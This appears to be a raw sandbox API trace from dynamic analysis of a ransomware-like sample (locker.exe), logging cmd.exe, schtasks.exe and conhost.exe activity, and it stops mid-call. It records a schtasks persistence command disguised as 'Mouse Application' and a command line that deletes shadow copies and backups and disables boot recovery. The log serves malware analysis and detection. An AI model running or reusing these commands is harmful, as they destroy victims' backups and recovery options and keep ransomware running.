_wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0110.510] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0110.510] GetProcessHeap () returned 0x3580000 [0110.510] RtlFreeHeap (HeapHandle=0x3580000, Flags=0x0, BaseAddress=0x3588180) returned 1 [0110.510] GetProcessHeap () returned 0x3580000 [0110.510] RtlAllocateHeap (HeapHandle=0x3580000, Flags=0x8, Size=0xa) returned 0x3588180 [0110.510] lstrcmpW (lpString1="\\schtasks.exe", lpString2="\\XCOPY.EXE") returned -1 [0110.516] _get_osfhandle (_FileHandle=1) returned 0x90 [0110.516] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0110.647] _get_osfhandle (_FileHandle=0) returned 0x8c [0110.647] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1f7) returned 1 [0110.756] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\schtasks.exe", lpCommandLine="schtasks /Create /SC MINUTE /TN \"Mouse Application\" /TR \"C:\\Users\\FD1HVy\\Desktop\\locker.exe\" /f", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x335f170*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="schtasks /Create /SC MINUTE /TN \"Mouse Application\" /TR \"C:\\Users\\FD1HVy\\Desktop\\locker.exe\" /f", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x335f1bc | out: lpCommandLine="schtasks /Create /SC MINUTE /TN \"Mouse Application\" /TR \"C:\\Users\\FD1HVy\\Desktop\\locker.exe\" /f", lpProcessInformation=0x335f1bc*(hProcess=0xe0, hThread=0xdc, dwProcessId=0x680, dwThreadId=0x774)) returned 1 [0111.269] CloseHandle (hObject=0xdc) returned 1 [0111.269] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0111.269] GetProcessHeap () returned 0x3580000 [0111.269] RtlFreeHeap (HeapHandle=0x3580000, Flags=0x0, BaseAddress=0x3586d00) returned 1 [0111.269] GetEnvironmentStringsW () returned 0x3586d00* [0111.269] GetProcessHeap () returned 0x3580000 [0111.269] RtlAllocateHeap (HeapHandle=0x3580000, Flags=0x8, Size=0xb1a) returned 0x3584c78 [0111.269] FreeEnvironmentStringsA (penv="=") returned 1 [0111.269] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0156.019] GetExitCodeProcess (in: hProcess=0xe0, lpExitCode=0x335f154 | out: lpExitCode=0x335f154*=0x0) returned 1 [0156.020] CloseHandle (hObject=0xe0) returned 1 [0156.020] _vsnwprintf (in: _Buffer=0x335f23c, _BufferCount=0x13, _Format="%08X", _ArgList=0x335f15c | out: _Buffer="00000000") returned 8 [0156.020] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0156.021] GetProcessHeap () returned 0x3580000 [0156.021] RtlFreeHeap (HeapHandle=0x3580000, Flags=0x0, BaseAddress=0x3584c78) returned 1 [0156.022] GetEnvironmentStringsW () returned 0x35882b8* [0156.022] GetProcessHeap () returned 0x3580000 [0156.022] RtlAllocateHeap (HeapHandle=0x3580000, Flags=0x8, Size=0xb40) returned 0x3584aa0 [0156.022] FreeEnvironmentStringsA (penv="=") returned 1 [0156.022] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0156.022] GetProcessHeap () returned 0x3580000 [0156.022] RtlFreeHeap (HeapHandle=0x3580000, Flags=0x0, BaseAddress=0x3584aa0) returned 1 [0156.022] GetEnvironmentStringsW () returned 0x35882b8* [0156.022] GetProcessHeap () returned 0x3580000 [0156.022] RtlAllocateHeap (HeapHandle=0x3580000, Flags=0x8, Size=0xb40) returned 0x3584aa0 [0156.022] FreeEnvironmentStringsA (penv="=") returned 1 [0156.022] GetProcessHeap () returned 0x3580000 [0156.022] RtlFreeHeap (HeapHandle=0x3580000, Flags=0x0, BaseAddress=0x3588180) returned 1 [0156.023] DeleteProcThreadAttributeList (in: lpAttributeList=0x335f1e8 | out: lpAttributeList=0x335f1e8) [0156.023] ??_V@YAXPAX@Z () returned 0x1 [0156.023] _get_osfhandle (_FileHandle=1) returned 0x90 [0156.023] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0156.107] _get_osfhandle (_FileHandle=1) returned 0x90 [0156.108] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xf73890 | out: lpMode=0xf73890) returned 1 [0156.232] _get_osfhandle (_FileHandle=1) returned 0x90 [0156.232] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0156.372] _get_osfhandle (_FileHandle=0) returned 0x8c [0156.372] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xf73894 | out: lpMode=0xf73894) returned 1 [0156.501] _get_osfhandle (_FileHandle=0) returned 0x8c [0156.501] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0156.614] SetConsoleInputExeNameW () returned 0x1 [0156.615] GetConsoleOutputCP () returned 0x1b5 [0156.791] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf73850 | out: lpCPInfo=0xf73850) returned 1 [0156.791] SetThreadUILanguage (LangId=0x0) returned 0x3110409 [0157.060] exit (_Code=0) [0157.061] ??_V@YAXPAX@Z () returned 0x1 Thread: id = 26 os_tid = 0x104c Process: id = "4" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x6dc95000" os_pid = "0xa50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x53c" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 21 os_tid = 0x900 Thread: id = 22 os_tid = 0x129c Thread: id = 23 os_tid = 0x994 Thread: id = 24 os_tid = 0xbf8 Thread: id = 25 os_tid = 0x1ec Process: id = "5" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0xb66c000" os_pid = "0xf74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x1170" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C wmic SHADOWCOPY DELETE & wbadmin DELETE SYSTEMSTATEBACKUP & bcdedit.exe / set{ default } bootstatuspolicy ignoreallfailures & bcdedit.exe / set{ default } recoveryenabled No" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 27 os_tid = 0xeac [0109.567] GetModuleHandleA (lpModuleName=0x0) returned 0xf40000 [0109.567] __set_app_type (_Type=0x1) [0109.567] __p__fmode () returned 0x776f3c14 [0109.567] __p__commode () returned 0x776f49ec [0109.567] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf56fd0) returned 0x0 [0109.567] __getmainargs (in: _Argc=0xf6d1a4, _Argv=0xf6d1a8, _Env=0xf6d1ac, _DoWildCard=0, _StartInfo=0xf6d1b8 | out: _Argc=0xf6d1a4, _Argv=0xf6d1a8, _Env=0xf6d1ac) returned 0 [0109.568] _onexit (_Func=0xf58030) returned 0xf58030 [0109.568] _onexit (_Func=0xf58040) returned 0xf58040 [0109.568] _onexit (_Func=0xf58050) returned 0xf58050 [0109.568] _onexit (_Func=0xf58060) returned 0xf58060 [0109.569] _onexit (_Func=0xf58070) returned 0xf58070 [0109.569] _onexit (_Func=0xf58080) returned 0xf58080 [0109.569] GetCurrentThreadId () returned 0xeac [0109.569] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xeac) returned 0xbc [0109.570] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x772d0000 [0109.570] GetProcAddress (hModule=0x772d0000, lpProcName="SetThreadUILanguage") returned 0x772e4f70 [0109.570] SetThreadUILanguage (LangId=0x0) returned 0x500409 [0110.066] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0110.066] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x6ffe10 | out: phkResult=0x6ffe10*=0x0) returned 0x2 [0110.066] VirtualQuery (in: lpAddress=0x6ffe1b, lpBuffer=0x6ffdc8, dwLength=0x1c | out: lpBuffer=0x6ffdc8*(BaseAddress=0x6ff000, AllocationBase=0x600000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0110.066] VirtualQuery (in: lpAddress=0x600000, lpBuffer=0x6ffdc8, dwLength=0x1c | out: lpBuffer=0x6ffdc8*(BaseAddress=0x600000, AllocationBase=0x600000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0110.066] VirtualQuery (in: lpAddress=0x601000, lpBuffer=0x6ffdc8, dwLength=0x1c | out: lpBuffer=0x6ffdc8*(BaseAddress=0x601000, AllocationBase=0x600000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0110.066] VirtualQuery (in: lpAddress=0x603000, lpBuffer=0x6ffdc8, dwLength=0x1c | out: lpBuffer=0x6ffdc8*(BaseAddress=0x603000, AllocationBase=0x600000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0110.066] VirtualQuery (in: lpAddress=0x700000, lpBuffer=0x6ffdc8, dwLength=0x1c | out: lpBuffer=0x6ffdc8*(BaseAddress=0x700000, AllocationBase=0x700000, AllocationProtect=0x2, RegionSize=0xc5000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0110.067] GetConsoleOutputCP () returned 0x1b5 [0110.252] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf73850 | out: lpCPInfo=0xf73850) returned 1 [0110.252] SetConsoleCtrlHandler (HandlerRoutine=0xf67260, Add=1) returned 1 [0110.252] _get_osfhandle (_FileHandle=1) returned 0x90 [0110.252] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xf7388c | out: lpMode=0xf7388c) returned 1 [0110.573] _get_osfhandle (_FileHandle=0) returned 0x8c [0110.573] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xf73888 | out: lpMode=0xf73888) returned 1 [0110.687] _get_osfhandle (_FileHandle=1) returned 0x90 [0110.687] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x0) returned 1 [0111.234] _get_osfhandle (_FileHandle=1) returned 0x90 [0111.235] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xf73890 | out: lpMode=0xf73890) returned 1 [0111.453] _get_osfhandle (_FileHandle=1) returned 0x90 [0111.453] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0111.799] _get_osfhandle (_FileHandle=0) returned 0x8c [0111.799] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xf73894 | out: lpMode=0xf73894) returned 1 [0112.034] _get_osfhandle (_FileHandle=0) returned 0x8c [0112.034] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0112.432] GetEnvironmentStringsW () returned 0xaa4d58* [0112.432] GetProcessHeap () returned 0xaa0000 [0112.432] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0xaca) returned 0xaa5830 [0112.433] FreeEnvironmentStringsA (penv="A") returned 1 [0112.433] GetProcessHeap () returned 0xaa0000 [0112.433] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x4) returned 0xaa4838 [0112.433] GetEnvironmentStringsW () returned 0xaa4d58* [0112.433] GetProcessHeap () returned 0xaa0000 [0112.433] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0xaca) returned 0xaa6308 [0112.434] FreeEnvironmentStringsA (penv="A") returned 1 [0112.434] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x6fed6c | out: phkResult=0x6fed6c*=0xcc) returned 0x0 [0112.434] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x6fed74, lpData=0x6fed78, lpcbData=0x6fed70*=0x1000 | out: lpType=0x6fed74*=0x0, lpData=0x6fed78*=0xc5, lpcbData=0x6fed70*=0x1000) returned 0x2 [0112.434] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x6fed74, lpData=0x6fed78, lpcbData=0x6fed70*=0x1000 | out: lpType=0x6fed74*=0x4, lpData=0x6fed78*=0x1, lpcbData=0x6fed70*=0x4) returned 0x0 [0112.435] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x6fed74, lpData=0x6fed78, lpcbData=0x6fed70*=0x1000 | out: lpType=0x6fed74*=0x0, lpData=0x6fed78*=0x1, lpcbData=0x6fed70*=0x1000) returned 0x2 [0112.435] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x6fed74, lpData=0x6fed78, lpcbData=0x6fed70*=0x1000 | out: lpType=0x6fed74*=0x4, lpData=0x6fed78*=0x0, lpcbData=0x6fed70*=0x4) returned 0x0 [0112.435] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x6fed74, lpData=0x6fed78, lpcbData=0x6fed70*=0x1000 | out: lpType=0x6fed74*=0x4, lpData=0x6fed78*=0x40, lpcbData=0x6fed70*=0x4) returned 0x0 [0112.435] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x6fed74, lpData=0x6fed78, lpcbData=0x6fed70*=0x1000 | out: lpType=0x6fed74*=0x4, lpData=0x6fed78*=0x40, lpcbData=0x6fed70*=0x4) returned 0x0 [0112.435] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0x6fed74, lpData=0x6fed78, lpcbData=0x6fed70*=0x1000 | out: lpType=0x6fed74*=0x0, lpData=0x6fed78*=0x40, lpcbData=0x6fed70*=0x1000) returned 0x2 [0112.435] RegCloseKey (hKey=0xcc) returned 0x0 [0112.435] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x6fed6c | out: phkResult=0x6fed6c*=0xcc) returned 0x0 [0112.435] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x6fed74, lpData=0x6fed78, lpcbData=0x6fed70*=0x1000 | out: lpType=0x6fed74*=0x0, lpData=0x6fed78*=0x40, lpcbData=0x6fed70*=0x1000) returned 0x2 [0112.435] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x6fed74, lpData=0x6fed78, lpcbData=0x6fed70*=0x1000 | out: lpType=0x6fed74*=0x4, lpData=0x6fed78*=0x1, lpcbData=0x6fed70*=0x4) returned 0x0 [0112.435] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x6fed74, lpData=0x6fed78, lpcbData=0x6fed70*=0x1000 | out: lpType=0x6fed74*=0x0, lpData=0x6fed78*=0x1, lpcbData=0x6fed70*=0x1000) returned 0x2 [0112.435] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x6fed74, lpData=0x6fed78, lpcbData=0x6fed70*=0x1000 | out: lpType=0x6fed74*=0x4, lpData=0x6fed78*=0x0, lpcbData=0x6fed70*=0x4) returned 0x0 [0112.435] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x6fed74, lpData=0x6fed78, lpcbData=0x6fed70*=0x1000 | out: lpType=0x6fed74*=0x4, lpData=0x6fed78*=0x9, lpcbData=0x6fed70*=0x4) returned 0x0 [0112.435] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x6fed74, lpData=0x6fed78, lpcbData=0x6fed70*=0x1000 | out: lpType=0x6fed74*=0x4, lpData=0x6fed78*=0x9, lpcbData=0x6fed70*=0x4) returned 0x0 [0112.436] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0x6fed74, lpData=0x6fed78, lpcbData=0x6fed70*=0x1000 | out: lpType=0x6fed74*=0x0, lpData=0x6fed78*=0x9, lpcbData=0x6fed70*=0x1000) returned 0x2 [0112.436] RegCloseKey (hKey=0xcc) returned 0x0 [0112.436] time (in: timer=0x0 | out: timer=0x0) returned 0x5f9969ab [0112.436] srand (_Seed=0x5f9969ab) [0112.436] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C wmic SHADOWCOPY DELETE & wbadmin DELETE SYSTEMSTATEBACKUP & bcdedit.exe / set{ default } bootstatuspolicy ignoreallfailures & bcdedit.exe / set{ default } recoveryenabled No" [0112.436] malloc (_Size=0x4000) returned 0x8821f0 [0112.437] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C wmic SHADOWCOPY DELETE & wbadmin DELETE SYSTEMSTATEBACKUP & bcdedit.exe / set{ default } bootstatuspolicy ignoreallfailures & bcdedit.exe / set{ default } recoveryenabled No" [0112.438] malloc (_Size=0xffce) returned 0xba0048 [0112.438] ??_V@YAXPAX@Z () returned 0x6ffd50 [0112.439] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0xba0048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0112.440] malloc (_Size=0xffce) returned 0xbb0020 [0112.440] ??_V@YAXPAX@Z () returned 0x6ffb24 [0112.441] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xbb0020, nSize=0x7fe7 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0112.441] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf6f840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0112.441] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf6f840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0112.441] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf6f840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0112.441] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0112.441] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0112.441] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0112.441] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0112.441] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0112.441] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0112.441] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0112.441] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0112.442] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0112.442] GetProcessHeap () returned 0xaa0000 [0112.442] RtlFreeHeap (HeapHandle=0xaa0000, Flags=0x0, BaseAddress=0xaa5830) returned 1 [0112.442] GetEnvironmentStringsW () returned 0xaa4d58* [0112.442] GetProcessHeap () returned 0xaa0000 [0112.442] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0xae2) returned 0xaa78d0 [0112.442] FreeEnvironmentStringsA (penv="A") returned 1 [0112.442] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf6f840, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0112.442] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf6f840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0112.442] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0112.443] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0112.443] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0112.443] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0112.443] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0112.443] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0112.443] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0112.443] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0112.443] malloc (_Size=0xffce) returned 0xbbfff8 [0112.443] ??_V@YAXPAX@Z () returned 0x6ff8bc [0112.444] GetProcessHeap () returned 0xaa0000 [0112.444] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x38) returned 0xaa0ae0 [0112.444] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0xbbfff8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0112.444] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x7fe7, lpBuffer=0xbbfff8, lpFilePart=0x6ff908 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x6ff908*="Desktop") returned 0x17 [0112.445] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0112.498] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x6ff688 | out: lpFindFileData=0x6ff688*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0xaa0b20 [0112.499] FindClose (in: hFindFile=0xaa0b20 | out: hFindFile=0xaa0b20) returned 1 [0112.499] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0x6ff688 | out: lpFindFileData=0x6ff688*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0xaa0b20 [0112.499] FindClose (in: hFindFile=0xaa0b20 | out: hFindFile=0xaa0b20) returned 1 [0112.499] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0x6ff688 | out: lpFindFileData=0x6ff688*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4369420e, ftLastAccessTime.dwHighDateTime=0x1d6ad29, ftLastWriteTime.dwLowDateTime=0x4369420e, ftLastWriteTime.dwHighDateTime=0x1d6ad29, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0xaa0b20 [0112.499] FindClose (in: hFindFile=0xaa0b20 | out: hFindFile=0xaa0b20) returned 1 [0112.500] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0112.500] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0112.500] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0112.500] GetProcessHeap () returned 0xaa0000 [0112.500] RtlFreeHeap (HeapHandle=0xaa0000, Flags=0x0, BaseAddress=0xaa78d0) returned 1 [0112.500] GetEnvironmentStringsW () returned 0xaa4d58* [0112.500] GetProcessHeap () returned 0xaa0000 [0112.500] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0xb1a) returned 0xaa6de0 [0112.500] FreeEnvironmentStringsA (penv="=") returned 1 [0112.500] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0xba0048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0112.500] GetProcessHeap () returned 0xaa0000 [0112.500] RtlFreeHeap (HeapHandle=0xaa0000, Flags=0x0, BaseAddress=0xaa0ae0) returned 1 [0112.500] ??_V@YAXPAX@Z () returned 0x1 [0112.500] ??_V@YAXPAX@Z () returned 0x1 [0112.500] GetProcessHeap () returned 0xaa0000 [0112.500] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x400e) returned 0xaa8ee8 [0112.501] GetProcessHeap () returned 0xaa0000 [0112.501] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x168) returned 0xaa7908 [0112.501] GetProcessHeap () returned 0xaa0000 [0112.501] RtlFreeHeap (HeapHandle=0xaa0000, Flags=0x0, BaseAddress=0xaa8ee8) returned 1 [0112.502] GetConsoleOutputCP () returned 0x1b5 [0113.226] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf73850 | out: lpCPInfo=0xf73850) returned 1 [0113.226] GetUserDefaultLCID () returned 0x409 [0113.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf6f82c, cchData=8 | out: lpLCData=":") returned 2 [0113.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x6ffc78, cchData=128 | out: lpLCData="0") returned 2 [0113.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x6ffc78, cchData=128 | out: lpLCData="0") returned 2 [0113.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x6ffc78, cchData=128 | out: lpLCData="1") returned 2 [0113.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf6f81c, cchData=8 | out: lpLCData="/") returned 2 [0113.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf6f7b8, cchData=32 | out: lpLCData="Mon") returned 4 [0113.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf6f778, cchData=32 | out: lpLCData="Tue") returned 4 [0113.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf6f738, cchData=32 | out: lpLCData="Wed") returned 4 [0113.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf6f6f8, cchData=32 | out: lpLCData="Thu") returned 4 [0113.228] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf6f6b8, cchData=32 | out: lpLCData="Fri") returned 4 [0113.228] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf6f678, cchData=32 | out: lpLCData="Sat") returned 4 [0113.228] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf6f638, cchData=32 | out: lpLCData="Sun") returned 4 [0113.228] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf6f80c, cchData=8 | out: 